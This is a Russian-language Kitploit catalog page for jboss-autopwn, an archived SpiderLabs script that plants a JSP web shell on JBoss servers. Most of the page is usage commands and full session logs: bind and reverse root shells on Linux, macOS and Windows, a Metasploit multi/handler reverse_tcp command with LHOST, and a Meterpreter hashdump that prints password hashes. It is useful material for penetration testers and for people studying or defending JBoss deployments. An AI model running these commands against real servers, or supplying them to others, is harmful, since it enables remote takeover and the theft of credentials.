Skip to content
KitploitKITPLOIT
ИнструментыЭксплойтыБлог
Log in
Отправить
ИнструментыЭксплойтыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
jboss-autopwn — Скрипт JBoss для получения удаленного доступа к оболочке | Kitploit
Инструменты/GitHubGitHub/spiderlabs/jboss-autopwn
Генерация полезной нагрузкиЭксплуатацияЭксплуатация веб-приложенийПост-эксплуатацияТестирование на ПроникновениеКомандование и УправлениеИнструмент Удаленного ДоступаArchived
GitHubspiderlabs/jboss-autopwn

jboss-autopwn

Скрипт JBoss для получения удаленного доступа к оболочке

Репозиторий
17755116 лет назадПроверено Kitploit

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

⚠️ ПРИМЕЧАНИЕ: Этот инструмент больше не поддерживается.

Скрипт JBoss Autopwn Christian G. Papathanasiou http://www.spiderlabs.com

ВВЕДЕНИЕ

Этот скрипт JBoss разворачивает JSP-оболочку на целевом сервере JBoss AS. После развертывания скрипт использует свои возможности загрузки и выполнения команд для предоставления интерактивного сеанса.

Возможности включают:

  • Мультиплатформенная поддержка – протестировано на целях Windows, Linux и Mac
  • Поддержка bind и reverse оболочек
  • Meterpreter оболочки и поддержка VNC для целей Windows

УСТАНОВКА

Зависимости включают:

  • Netcat
  • Curl
  • Metasploit v3, установленный в текущем пути как "framework3"

ИСПОЛЬЗОВАНИЕ

Используйте e.sh для целей *nix, использующих bind_tcp и reverse_tcp

./e.sh target_ip tcp_port

Используйте e2.sh для целей Windows, которые могут выполнять полезные нагрузки Metasploit Windows

./e2.sh target_ip tcp_port

ПРИМЕРЫ

Linux bind оболочка:

[root@nitrogen jboss]# ./e.sh 192.168.1.2 8080 2>/dev/null [x] Получение cookie [x] Создание BSH скрипта... [x] .war файл успешно создан в /tmp [x] Развертывание .war файла: http://192.168.1.2:8080/browser/browser/browser.jsp [x] Запуск от пользователя...: uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel) [x] Имя сервера (uname)...: Linux nitrogen 2.6.29.6-213.fc11.x86_64 #1 SMP Tue Jul 7 21:02:57 EDT 2009 x86_64 x86_64 x86_64 GNU/Linux [!] Хотите загрузить reverse или bind оболочку? bind [!] На каком порту должна слушать bind оболочка? 31337 [x] Загрузка полезной нагрузки bind оболочки.. [x] Проверка успешности загрузки... -rwxrwxrwx 1 root root 172 2009-11-22 19:48 /tmp/payload [x] У вас должна быть bind оболочка на 192.168.1.2:31337.. [x] Перемещаем вас в оболочку... Connection to 192.168.1.2 31337 port [tcp/*] succeeded! id uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel) python -c 'import pty; pty.spawn("/bin/bash")' [root@nitrogen /]# full interactive shell :-)

Linux reverse оболочка:

[root@nitrogen jboss]# nc -lv 31337 & [1] 15536 [root@nitrogen jboss]# ./e.sh 192.168.1.2 8080 2>/dev/null [x] Получение cookie [x] Создание BSH скрипта... [x] .war файл успешно создан в /tmp [x] Развертывание .war файла: http://192.168.1.2:8080/browser/browser/browser.jsp [x] Запуск от пользователя...: uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel) [x] Имя сервера (uname)...: Linux nitrogen 2.6.29.6-213.fc11.x86_64 #1 SMP Tue Jul 7 21:02:57 EDT 2009 x86_64 x86_64 x86_64 GNU/Linux [!] Хотите загрузить reverse или bind оболочку? reverse [!] На каком порту принять reverse оболочку? 31337 [x] Загрузка полезной нагрузки reverse оболочки.. [x] Проверка успешности загрузки... -rwxrwxrwx 1 root root 157 2009-11-22 19:49 /tmp/payload Connection from 192.168.1.2 port 31337 [tcp/*] accepted [x] У вас должна быть reverse оболочка на localhost:31337.. [root@nitrogen jboss]# jobs [1]+ Running nc -lv 31337 & [root@nitrogen jboss]# fg 1 nc -lv 31337 id uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel) python -c 'import pty; pty.spawn("/bin/bash")'; [root@nitrogen /]# full interactive tty :-) full interactive tty :-)

Против MacOS X (bind оболочка):

[root@nitrogen jboss]# ./e.sh 192.168.1.5 8080 2>/dev/null [x] Получение cookie [x] Создание BSH скрипта... [x] .war файл успешно создан в /tmp [x] Развертывание .war файла: http://192.168.1.5:8080/browser/browser/browser.jsp [x] Запуск от пользователя...: uid=0(root) gid=0(wheel) groups=0(wheel),1(daemon),2(kmem),8(procview),29(certusers),3(sys),9(procmod),4(tty),5(operator),101(com.apple.sharepoint.group.1),80(admin),20(staff),102(com.apple.sharepoint.group.2) [x] Имя сервера (uname)...: Darwin helium-2.tiscali.co.uk 9.7.1 Darwin Kernel Version 9.7.1: Thu Apr 23 13:52:18 PDT 2009; root:xnu-1228.14.1~1/RELEASE_I386 i386 [!] Хотите загрузить reverse или bind оболочку? bind [!] На каком порту должна слушать bind оболочка? 31337 [x] Загрузка полезной нагрузки bind оболочки.. [x] Проверка успешности загрузки... -rwxrwxrwx 1 root wheel 172 22 Nov 19:58 /tmp/payload [x] У вас должна быть bind оболочка на 192.168.1.5:31337.. [x] Перемещаем вас в оболочку... Connection to 192.168.1.5 31337 port [tcp/*] succeeded! id uid=0(root) gid=0(wheel) groups=0(wheel),1(daemon),2(kmem),8(procview),29(certusers),3(sys),9(procmod),4(tty),5(operator),101(com.apple.sharepoint.group.1),80(admin),20(staff),102(com.apple.sharepoint.group.2) python -c 'import pty; pty.spawn("/bin/bash")' bash-3.2# id id uid=0(root) gid=0(wheel) groups=0(wheel),1(daemon),2(kmem),8(procview),29(certusers),3(sys),9(procmod),4(tty),5(operator),101(com.apple.sharepoint.group.1),80(admin),20(staff),102(com.apple.sharepoint.group.2) bash-3.2#

То же самое для reverse оболочки.

Windows bind оболочка:

[root@nitrogen jboss]# ./e2.sh 192.168.1.225 8080 2>/dev/null [x] Получение cookie [x] Создание BSH скрипта... [x] .war файл успешно создан на c: [x] Развертывание .war файла: [x] Web shell включена!: http://192.168.1.225:8080/browserwin/browser/Browser.jsp [x] Имя сервера...: Host Name . . . . . . . . . . . . : aquarius [x] Хотите reverse, bind оболочку или vnc(bind)? bind [x] На каком порту должна слушать ваша bind оболочка? 31337 [x] Загрузка полезной нагрузки bind оболочки.. [x] Проверка, что bind оболочка загружена корректно.. [x] Bind оболочка загружена: 22/11/2009 18:35 87,552 payload.exe [x] Выполнение bind оболочки... [x] Bind оболочка выполнена! [x] Возврат к metasploit.... [] Started bind handler [] Starting the payload handler... [*] Command shell session 1 opened (192.168.1.2:60535 -> 192.168.1.225:31337)

Microsoft Windows XP [Version 5.1.2600] (C) Copyright 1985-2001 Microsoft Corp.

C:\Documents and Settings\chris\Desktop\jboss-4.2.3.GA\server\default\tmp\deploy\tmp8376972724011216327browserwin-exp.war>

Windows reverse оболочка с полезной нагрузкой Metasploit meterpreter:

[root@nitrogen jboss]# ./e2.sh 192.168.1.225 8080 2>/dev/null [x] Получение cookie [x] Создание BSH скрипта... [x] .war файл успешно создан на c: [x] Развертывание .war файла: [x] Web shell включена!: http://192.168.1.225:8080/browserwin/browser/Browser.jsp [x] Имя сервера...: Host Name . . . . . . . . . . . . : aquarius [x] Хотите reverse, bind оболочку или vnc(bind)? reverse [x] На каком порту принять вашу reverse оболочку? 31337 [x] Загрузка полезной нагрузки reverse оболочки.. [x] Проверка, что reverse оболочка загружена корректно.. [x] Reverse оболочка загружена: 22/11/2009 18:46 87,552 payload.exe [x] У вас есть 20 секунд, чтобы запустить metasploit, прежде чем я отправлю reverse оболочку обратно.. ctrl-z, bg затем введите: framework3/msfcli exploit/multi/handler PAYLOAD=windows/meterpreter/reverse_tcp LHOST=192.168.1.2 LPORT=31337 E [x] Выполнение reverse оболочки... [x] Reverse оболочка выполнена! [root@nitrogen jboss]#

В терминале 2:

[root@nitrogen jboss]# framework3/msfcli exploit/multi/handler PAYLOAD=windows/meterpreter/reverse_tcp LHOST=192.168.1.2 LPORT=31337 E

[] Please wait while we load the module tree... [] Started reverse handler on port 31337 [] Starting the payload handler... [] Sending stage (719360 bytes) [*] Meterpreter session 1 opened (192.168.1.2:31337 -> 192.168.1.225:1266)

meterpreter > use priv Loading extension priv...success. meterpreter > hashdump Administrator:500:xxxxxxxxxxxxxxxxxxxxxxx:xxxxxxxxxxxxxxxxxxxxxxxxxx::: chris:1005:xxxxxxxxxxxxxxxxxxxxxx:xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx::: Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: HelpAssistant:1004:5cb061f95caf6a9dc7d1bb971b333632:4ac4ee4210529e17665db586df844736::: SUPPORT_388945a0:1002:aad3b435b51404eeaad3b435b51404ee:293c804ee7b7f93b3919344842b9c98a::: vmware_user:1007:aad3b435b51404eeaad3b435b51404ee:a9fa3213d080de5533c7572775a149f5::: meterpreter >

Windows VNC оболочка:

Скачать инструмент